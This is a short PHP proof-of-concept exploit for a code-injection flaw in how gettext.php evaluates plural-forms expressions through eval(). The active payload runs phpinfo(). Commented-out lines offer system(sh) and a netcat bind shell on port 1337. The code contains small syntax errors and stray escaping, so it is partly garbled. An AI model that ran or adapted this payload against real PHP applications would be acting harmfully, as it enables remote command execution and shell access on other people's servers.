<?php
//$expr= ("system(sh)");  // payload1
//$expr= (`nc -l -p 1337 -e /bin/sh`); // payload that is not eval-dependant
$expr=("phpinfo()"); // payload2 (PoC)

//$expr = preg_replace(\'@[^a-zA-Z0-9_:;\\(\\)\\?\\|\\&=!<>+*/\\%-]@\', \'\', $expr);//  vuln
$expr = preg_replace(\'@[^a-zA-Z0-9_:;\\(\\)\\?\\|\\&=!<>+*/\\%-]@\', \'\', $expr);/

$expr .= \';\';

 // Add parenthesis for tertiary \'?\' operator.
$expr .= \';\';
$res = \'\';
$p = 0;
for ($i = 0; $i < strlen($expr); $i++) {
    $ch = $expr[$i];
    switch ($ch) {
        case \'?\':
            $res .= \' ? (\';
            $p++;
            break;
        case \':\':
            $res .= \') : (\';
            break;
        case \';\':
            $res .= str_repeat( \')\', $p) . \';\';
            $p = 0;
            break;
    default:
        $res .= $ch;
    }
}

// Vulnerable function :
$n= (1);
$total=("1000");

 if (!is_int($n)) {
      throw new InvalidArgumentException(
        "Select_string only accepts integers: " . $n); // test sur la version 2 de gettext.php
}

$string = str_replace(\'nplurals\',"\\$total",$res);
$string = str_replace("n",$res,$res);
$string = str_replace(\'plural\',"\\$plural",$res);
eval("$string");
?>